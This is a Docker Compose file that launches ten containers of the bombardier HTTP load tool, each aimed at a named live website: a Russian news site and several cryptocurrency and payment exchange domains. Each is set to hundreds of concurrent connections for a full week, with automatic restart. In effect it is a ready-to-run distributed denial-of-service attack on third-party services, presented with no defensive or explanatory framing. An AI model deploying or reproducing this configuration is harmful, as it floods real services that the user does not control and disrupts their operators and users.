version: "3"

services:
  lenta.ru:
    container_name: lenta.ru
    image: alpine/bombardier
    restart: always
    command: -c 500 -d 604800s -l lenta.ru

  cleanbtc.ru:
    container_name: cleanbtc.ru
    image: alpine/bombardier
    restart: always
    command: -c 200 -d 604800s -l cleanbtc.ru

  bonkypay.com:
    container_name: bonkypay.com
    image: alpine/bombardier
    restart: always
    command: -c 200 -d 604800s -l bonkypay.com

  changer.club:
    container_name: changer.club
    image: alpine/bombardier
    restart: always
    command: -c 200 -d 604800s -l changer.club

  superchange.net:
    container_name: superchange.net
    image: alpine/bombardier
    restart: always
    command: -c 200 -d 604800s -l superchange.net

  mine.exchange:
    container_name: mine.exchange
    image: alpine/bombardier
    restart: always
    command: -c 200 -d 604800s -l mine.exchange

  platov.co:
    container_name: platov.co
    image: alpine/bombardier
    restart: always
    command: -c 200 -d 604800s -l platov.co

  ww-pay.net:
    container_name: ww-pay.net
    image: alpine/bombardier
    restart: always
    command: -c 200 -d 604800s -l ww-pay.net

  delets.cash:
    container_name: delets.cash
    image: alpine/bombardier
    restart: always
    command: -c 200 -d 604800s -l delets.cash

  betatransfer.org:
    container_name: betatransfer.org
    image: alpine/bombardier
    restart: always
    command: -c 200 -d 604800s -l betatransfer.org
